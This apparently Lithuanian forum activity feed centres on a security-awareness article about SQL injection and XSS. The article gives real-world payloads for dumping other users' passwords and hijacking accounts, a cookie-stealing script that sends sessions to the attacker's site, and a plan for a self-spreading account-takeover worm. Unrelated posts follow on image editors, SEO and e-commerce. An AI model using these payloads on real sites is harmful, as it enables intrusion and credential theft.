wetenis
-
Pranešimai
2.133 -
Užsiregistravo
-
Lankėsi
-
Laimėta dienų
1 -
Atsiliepimai
100%
Reputacijos išklotinė
-
-
-
-
-
-
-
-
-
-
-
wetenis sureagavo į pushkis WEB sistemų saugumas ir jų auditas
Kas nutiktų, jei kiekvienas pasaulio gyventojas turėtų po automatinį ginklą? Turbūt įsivyrautų anarchija ir chaosas.
PHP yra viena iš lengviausiai įsisavinamų programavimo kalbų, o atsižvelgiant į tai, kad nuolat didėja žmonių žingeidumas ir domėjimasis IT, tai dažnas jų bando kurti web sprendimus, kas ir yra (web sprendimai) tie automatiniai ginklai apie kuriuos užsiminiau.
Programos yra skirtos apdoroti ir dirbti su dideliais duomenų kiekiais, o informacijos valdymas šiais laikais ir yra didžiausias ginklas, juk ne veltui sakoma – kas valdo informaciją, tas valdo pasaulį. Kasdien mes registruojamės įvairiuose interneto platybių vietose ir ten pateikiame savo duomenis, slaptažodžius. O kas būtų, jei vieną dieną visai tai būtų paviešinta? Turbūt nieko gero...
O dabar prie techninių detalių. Iš patirties galiu pasakyti, kad būdų (kalbu apie web) rasti priėjimą prie įmonės duomenų yra N, bet šįkart norėčiau aptarti dažniausiai pasitaikančius du, kurie yra lengviausiai aptinkami ir išnaudojami.
SQL injection
SQL injekcijos tikslas yra išnaudoti galimybę pateikti formos arba GET užklausos kintamajį taip, kad galėtume pakoreaguoti originalią užklausą savo naudai. Niekada nemėgau teorijos ir visada buvau praktikas, tai tikiu, kad ir jums pavyzdys bus patogiau:
Taip atrodo kodas, esantis serveryje.
$vartotojas=$_POST[„user“]; $uzklausa="SELECT * FROM users WHERE name='$vartotojas’";
O kas būtų, jei vartotojo langelyje įrašytume
' or '1'='1 ?
Rezultatas gautųsi toks:
$uzklausa="SELECT * FROM users WHERE name='’ or ‘1’=’1’";
Suformavę tokią užklausą gauname, kad visada yra tenkinama sąlyga, nes 1 visada lygu 1. Tai buvo pats paprasčiausias pavyzdys, kuris pateikiamas kiekviename SQL injection straipsnyje, bet jei manote, kad viskas čia tuo ir apsiriboja, tai galiu pasakyti, kad klystate, nes realioje situacijoje tenka pakankamai pavargti, kartais ir paspėlioti, kol perprantama, kaip teisingai suformuoti užklausą.
Turiu vieną katalogą, kuriame kartais išsisaugau tokius dalykus, tai štai jums gyvenimiškesni pavyzdžiai:
Čia per slaptažodžio priminimo formą galėjau atsisiųsti kitų vartotojų slaptažodžius
' or email='[email protected]' union select '[email protected]',concat(email,':',DECODE(password,'client')) from clients limit 100,1 #
Čia per slaptažodžio keitimo formą galėjau pakeisti slaptažodį betkuriam vartotojui.
', 'site_administrators') or password=password AND id = '458' AND 'a'='a' #
Čia reikėjo sužinoti lentelės stulpelių pavadinimus žinant jos pavadinimą.
' limit 0 union select 1,(SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='users' limit 0,1) COLLATE utf8_unicode_ci,3,4,5,6,7,8,9 from users where password!='admin' or '
Traukiu slaptažodžius
' limit 0 union select 1,(SELECT CONCAT(id,'|',namex,'|',passwordx,'|',permission,'|',email,'|',u_name,'|',u_surname,'|',company,'|',admin_title) FROM users limit 0,1),3,4,5,6,7,8,9 from users where password!='admin' or '
Aš čia tikrai nesurašysiu visų galimų atvejų, nes tai būtų neįmanoma, o kiekvienas toks potyris yra unikalus, bet noriu sudominti, kad domėtumėtės ir bandytumėte, nes jūs niekada neparašysite saugaus kodo, kol į viską nepažvelgsite iš tos kitos pusės – saugumo specialisto pusės.
XSS (Cross site scripting)
„<script>alert(„Jūs buvote nulaužtas“)</script> bla=”
Tai yra XSS atakos pavyzdys, bet jo panaudojimas yra pateiktas iš standartinių XSS pavyzdžių. Pirmiausiai aptarkime jo technines panaudojimo galimybes, o tada prieisime prie jo praktiškesnio panaudojimo galimybių.
HTML laukelis
<input type=”text” value=”<?=$_GET[‘kintamasis1’]?>”>
Suformuota užklausa
www.svetaine.lt/?kintamasis1=x“ <script>alert(„Jūs buvote nulaužtas“)</script
Rezultatas HTML’E
<input type=”text” value=”x” <script>alert(„Jūs buvote nulaužtas“)</script>“
Rezultatas svetainėje yra akivaizdžiai matomas – jums iššoks lentelė, kad buvote nulaužtas. Tačiau tai, kad jūs pamatysite tokią lentelę naudos neduoda, tačiau dažnai galima susidurti su problema, kai tokie duomenys yra išsaugomi duomenų bazėje ir jie atvaizduojami kitiems lankytojams. Bet vėl gi, kokia jums nauda, jei ši lentelė iššoks kažkam? Atsakymas paprastas – jokios.
<script>document.location='http://www.tavosvetaine.lt/skriptas.php?sesija='+document.cookie</script>
Štai čia ir prasideda visas įdomumas. Pateiktame pavyzdyje lankytojas yra nukreipiamas į jūsų svetainės skriptą, kuriam perduodamas lankytojo sesijos ID. Toliau yra tik vienas kelias. Jūsų skriptas turėdamas sesijos ID gali naudodamas CURL biblioteką prisijungti prie „aukos“ paskyros ir atlikti jums reikalingus veiksmus (keisti duomenis ir pan.).
Žinau, kad laukiate realaus pavyzdžio, tai jūsų negalima nuvilti. Anksčiau šis pažeidžiamumas egzistavo vienoje pažinčių svetainėje, kai savo anketos formoje galėjai įrašyti tokį kodą. Kaip tai buvo galima išnaudoti? Slaptažodžiai pas juos DB buvo nekoduojami (slaptažodžio priminimo funkcija atsiunčia ne naują slaptažodį, o esantį).
Eiga:
Patalpinama kodą savo anketoją ir paruošiame skriptą, kuris perims sesijos duomenis.
Užeiname į kelių narių anketas ir 90% jų aplanko tavąją.
Perimamme jų sesijos ID ir pakeičiame jų paskyros el. paštą į savo.
Atsisiunčiame slaptažodį.
El. paštą atstatome į originalų, kad liktume nepastebėti.
Jų anketoje įdiegiame kenksmingą javascript.
Rezultate gausime, kad kenksmingas kodas labai greit išplis per visų narių anketas, o į mūsų pašto dėžutę suplauks daugybė slaptažodžių.
Apibendriminas
Šį straipsnį rašiau ne tam, kad jis būtų panaudotas blogiems tikslams, bet atvirkščiai – kad taptumėte geresniais programuotojais. Pasirinkdami šią specialybė jūs privalote suprasti, jog jūsų rankose bus neįkainuojama informacija, kurią jums patikės jūsų darbdaviai, klientai, o vieną kartą juos nuvylę daugiau galite ir nebe susigrąžinti. Tikiuosi, kad šis straipsnis padės jums suvogti, jog neužtenka vien sukurti produktą, bet reikia, kad jis būtų ir saugaus, nes šiuolaikinis verslas yra informacijos verslas.
P.S Apmaudu, kad savo praktikoje teko susidurti su ne vienu vadovu, kurie investuoja didžiules sumas į produktų sukūrimą, bet visiškai neįvertina fakto, kad jų verslas gali būti sužlugdytas per 1 valandos saugumo auditą. Šioje vietoje įžvelgiu labai gerą verslo nišą, nes Lietuvoje yra tik kelios rimtos įmonės, kurios gali atlikti saugumo auditus, bet viskam savas laikas...
-
wetenis sureagavo į KingPin TOP 10 Photoshop alternatyvų
Šaltinis: http://www.facebook.com/gdgroup
TOP 10 Photoshop alternatyvų
Nesenai pastebėjau diskusiją apie „Photoshop“ alternatyvas. Tokių yra, tikrai neblogų ir kas svarbiausia – jos kainuoja žymiai mažiau arba yra netgi nemokamos. Nebūtina mokėti didelių sumų, norint turėti kokybišką programinę įrangą!
Gimp – www.gimp.org tikrai galingas įrankis, menkai tenusileidžiantis photoshop. Keletas minusų: turi mažiau resursų, nei photoshop, įskiepių, jie prastesnės kokybės, taipogi yra nesuderinamumų su cmyk., šiek tiek sunkoka pereiti nuo photoshop prie gimp, reikalauja daugiau darbo laiko, siekiant pasiekti tokį pat rezultatą atliekant kai kurias funkcijas.
Daugiauplatformė. Atvirojo kodo.
Paint.NET www.getpaint.net . Paprasta ir lengvai naudojama programinė įranga, deja, dirba tik Windows aplinkoje. Nemokama.
PhotoLine – www.pl32.com . Skirta tik Mac’ams. Tikrai galinga programa, tačiau vartotojo sąsaja gali pasirodyti šiek tiek painoka pradedančiajam.
SplashUp – www.splashup.com . Didžiausias privalumas (o gal trūkumas?) – prieinama per naršyklę, nereikalauja instaliacijos. Turi daugumą populiariausių įrankių, bei leidžia baigtus darbus lengvai “sharinti” socialiniuose tinkluose.
FotoFlexer – www.fotoflexer.com . Dar viena rengyklė, kuri veikia naršyklėje. Naudinga, kai reikia lengvai ir greitai redaguoti paveikslėlį, taipogi turi integraciją su socialiniais tinklais. Photoshopui ši programėlė gal ir neprilygs, bet ji žavi savo lengvumu.
PicNic – www.picnic.com . Dar vienas naršyklės pagrindu veikiantis editorius. Turi vieną funkciją, kurios Jūs pasigesite kitose rengyklėse – spausdinimas. Gana paprastas ir lengvas naudoti, savo funkcijomis daug nusileižia “Photoshop”.
Pixlr – www.pixlr.com . Tai beveik photoshopas, tik nemokamas ir veikiantis naršyklėje J . Galima netgi prieiti pvz rašmenis, patalpintus Jūsų kompiuteryje.
SumoPaint – www.sumopaint.com . Turi labai daug galimybių, tai lyg photoshop’as su šiek tiek adobe illustrator funkcijų.
CorelPaintShop Pro – Programinė įranga, lygiagreti photoshop’ui. Daug kas sako, jog vartotojo sąsaja paprastesnė, tačiau mes su tuo nesutinkame. Palaiko tik Windows operacinė sistemą.
ColorDigital Studio – Naujausias corel gaminys. Vėlgi apeliuojama, jog produktas geresnis nes vartotojo sąsaja gražesnė, neužgrūsta įvairiausiais įrankiais. Mūsų tokie argumentai neįtikina, bet konkurentas yra konkurentas, galbūt ši programinė įranga taip pat atras savo gerbėjus.
-
-
wetenis sureagavo į ehehas Kokius kvepalus naudojate?
http://starzimports.com/zencart/images/Armani%20Code.jpg -
wetenis sureagavo į alias Mašina su vairu dešinėje
Kaip suprasti 'siųstų' į Lietuvą? Supakuotų į dežutę ir per paštą? ;)
Pirk iš bet kur, ir ieškokis vežėjų, kurie pargabentų į Lietuvą -- tokių skelbimuose daug.
-
wetenis sureagavo į SCANIA „Facebook“ žengia pirmuosius elektroninės prekybos žingsnius
Su laiku FB acc, pakeis pasus ir bus kaip tapatybės kortelė ir pavadinimas tiktų :D
-
wetenis sureagavo į sparagas Trumpa Apklausa Apie Jusu Mobiliuosius
Cia kai atsakai i anketa, sitame forume reikia parasyti kad atsakiau? Nesuprantu
-
wetenis sureagavo į Modestas. Akatsaki prisistato :)
tau 18 metų, o tu visą laisvą laiką prie kompo praleidi... pyk nepykęs, bet man tavęs nuošrdžiai gaila...
kai aš buvau 13 ar 14 metų, persikraustėm, tai neturėjau draugų kieme. tai visą laiką prie kompo leisdavau, ir taip gal metus, bet po to pats pradėjau galvot, jog čia #####, ne gyvenimas, pradėjau į kiemą "išlyst", susipažinau su keliais normaliais(tada bent jau taip atrodė) "vaikais", tai prie kompiuterio šyškiai mažiau laiko praleisdavau. aš asmeniškai ir nemegėjas gerti, nerūkau, bet prie progos neatsisakau išgert.
jei jau džiūni namie, tai bent knygą į rankas pasiimk, nes su mokslais sakai ir blogai sekas...
žodžiu, mano patarimai:pradėk mokytis, išeik pradžiai gal balkoną, po to pradėk į lauką išlysti, bendrauti su žmonėm ne vien per skype ir fb. pasportuot ir pravestų, bent kiek iš nuotraukos matau.
mano manymu, tu kažko gėdyjies, dėl kažko kompleksuoji, dėl to namie daugiausiai laiko praleidi, neini į pamokas. gal praverstų psichologo pagalba...
p.s.žinau, jog čia žiauriai galbūt parašiau, bet gal mano postas privers tave susimąstyti, jog turėtum kažką gyvenime keisti...
aišku, visi gyvenimo malonumus įsivaizduoja skirtingai, bet nelabai nutuokiu, kaip galima džiaugtis gyvenimu prie kompiuterio ekrano?
ir patikėk, ne pinigai gyvenime svarbiausi(svarbiausia jų kiekis:)))juokauju) :)
-
wetenis sureagavo į MrLedas Ieškau patarėjo/konsultanto
Kaip ispopuliarint svetaine:
Puslapio tvarkymas:
1. Parinkt tinkamus raktazodzius. Pvz: mano puslapis apie lineage2, tai keywordus pasirinkau Lineage2, l2, Lineage II.
2. Puslapio title nustatyt atitinkama. Pvz: Lineage 2 Topai.
3. Puslapio aprasymas. Pvz: Lineage2 siuntiniai, topai, l2j...
4. Padaryt draugiskas nuorodas paieskos sistemoms. Pvz: http://www.puslapis.lt/index.php?11 - cia nelabai draugiska nuoroda, http://www.puslapis.lt/draugiskas_nuoroda.php - cia draugiska nuoroda.
5. Uzpildit puslapi gan dideliu kiekiu informacijos. (o ne taip pakuriai puslapi ir lauki kol lankytojai prades tau ji pildit, jai pats neturi noro, gali pasamdyt kanors.)
6. Na manau dar yra geras dalykas pvz kaip wordprese pluginas meta tagai.
7. Sitemap kaip paminejo petriux. Jai as neklistu tai sitemap padeda google greiciau indexuot puslapi. (Paieskojus uzdarbis.lt galima rast nuorodu, kur galima sukurt nemokamai sitemap, daugeliui tvs yra pakurta modu, kurie automatiskai sukuria sitemapa)
Puslapio reklamavimas:
1. Patalpint puslapio nuoroda i nemokamus katalogus.
2. Publikot savo puslapi forumose, kur tai yra leidziama.
3. Rasyt straipsnius, gale nurodyt: noredami patalpint straipsni i savo puslapi nurodykit autoriu ir puslapio nuoroda.
4. Apsikeist nuorodom su kitai puslapiai.
5. Jai leidzia pinigine, nupirkt backlinku.
6. Jai tavo puslapis turi paveikslelio nustatyk google webmasters kad juos galetu rodyt per paveiksleliu paieska taip gaunama dar trafiko.
Pridedu lista kur nemokamai galima talpint nuoroda:
Nemokama puslapio reklama
Kas 3 dienas:
http://www.idomiausia.info/
http://www.juokai.net/nuorodu_palikinejimas/
http://nuorodos.gan.lt/
http://reklamink.xz.lt/
http://nuoroda.xz.lt/
http://vipux.com/index.php?page=30
http://tekstai.com/nuorodos.php
http://download.uzeik.net/nuorodupalikinejimas/
http://ozas.itg.lt/nuorodos/index.php
Kas 31 diena:
http://www.nk.lt/inuorodos/
http://www.skelbimas.lt/
http://www.skelbimai.lt/
http://www.skelbiu.lt/
http://www.skelbikas.lt/
http://www.parduodu-perku.lt/
http://skelbiam.info/
http://skelbiu24.lt/
http://100skelbimu.lt/
http://www.skelbimai.tv/
http://skelbimai.infotakas.lt/
http://skelbimai.aina.lt/
http://www.nemokamiskelbimai.lt/
http://www.paslauga.lt
Kas nauja projekta arba atnaujinima padarai projektui:
http://www.diskusijos.lt/
http://www.diskutuok.lt/
http://www.plepek.com/
http://www.affiliate.lt
http://www.uzdarbis.lt/
http://www.gsmforumas.info/forum/
http://www.simpsonslt.ten.lt/
http://computerbild.veidas.lt/forumas/
http://www.e-pasaulis.com/
http://stotis.net/
http://forum.skanus.lt/
http://forum.delfi.lt/
http://www.svajos.com/forum/index.php
http://forumas.draugas.lt/
http://forum.mintys.lt/
http://linksmas.net/
http://www.e-lietuva.net/forumas/f46-Tavo-reklama.html
http://chatas.lt/
http://links4u.lt/
1 kart gyvenime katalogai:
http://top.webpasaulis.net
http://www.sko.lt
http://direktorija.lt/
http://ooo.lt/
http://gaires.lt
http://surask.lt/
http://zipas.lt/
http://katalogas.uzeik.net/
http://katalogas.info/
http://saitai.lt/
http://www.Search.lt
http://www.tika.lt/
http://www.Katalogas.net
http://alexa.lt/
http://systemos.lt/catalog/
http://bestweb.lt/
http://ltv.lt/
http://www.on.lt
http://www.dmoz.org/World/Lietuvi%C5%B3/
http://ypac.lt/
http://nerandu.lt/
http://naudinga.lt/
http://pasaulis.com/paieska/index.php
http://www.delfi.lt/directory/
http://www.rates.lt/index.php
http://www.pridek.lt/
http://www.tinklo.info/
http://www.svetainiukatalogas.lt/
http://www.webaz.lt/
http://www.pcp.lt/
http://www.pridek.lt/
Nemokamas banneriu talpinimas 125x125
http://matomi.lt/
Nepirkdamas reklamos, lankomuma pasiekiau iki ~300 unikaliu lankytoju.
Tai yra viskas, ka as zinau, galiu daug kur klist, ne esu seo zinovas
-
-
wetenis sureagavo į biz PayPal + VMI: kaip apibrėžti individualios veiklos išlaidas?
Klausimas - perku is uzsienio firmos, mano imonei israso faktura uzsienio valiuta. Tai kaip as ja turiu apiformint? Ta prasme ja isverst reikia ar tiesiog parasyt balanse suma litais ir turet ta uzsienine faktura?
-
wetenis sureagavo į euro Alternatyva PayPal
na ir tema... tokio, kuris visiems duotu po 1000$ uz prisiregistravima, kas menesi organizuotu keliones i Las Vegasa ir kuriame butu galima atsiskaityti vogtom kortelem.
kokie yra bankai - tokiais ir naudojiesi. o kad cia fantazuosi - tik tusciai gaisi savo laika.
-
wetenis sureagavo į !karolis Tiekejai,paieska,bendravimas
Tai dropshippingas yra tada, kai sukuri el parduotuvę, ir jei kas nors daro užsakymą iš tavo parduotuvės, tu tą užsakymą perduoti tiekėjui. Tiekėjas iškart prekę nusiunčia užsakovui. Uždirbi nuo kainų skirtumo (randi prekę pigiau, bet pasiūlai ją brangiau, kainų skirtumas ir yra tavo gaunamas pelnas)
Minusas: gali būti ilgas siuntimo laikas
Pliusas: nereikia siūstis pačiam daiktų ir laikyti pas save.
Dažniausiai vykdoma taip: iš tiekėjų nusiperki prekių, jas tau atsiunčia. Tada tas prekes perparduodi.
Pliusas: greitas prekės siuntimo laikas.
Minusas: visas prekes reikia būti užsipirkus ir laikyti sandėlyje.
-
wetenis sureagavo į ESC Automobilių reklamos
Štai ta su skeitu ;)
http://www.youtube.com/watch?v=ziL6X8z7XHE
-
wetenis gavo reakciją nuo ESC Automobilių reklamos
rodė rodė tą :)
man rods net ir šita kelis kartus buvo išlindus: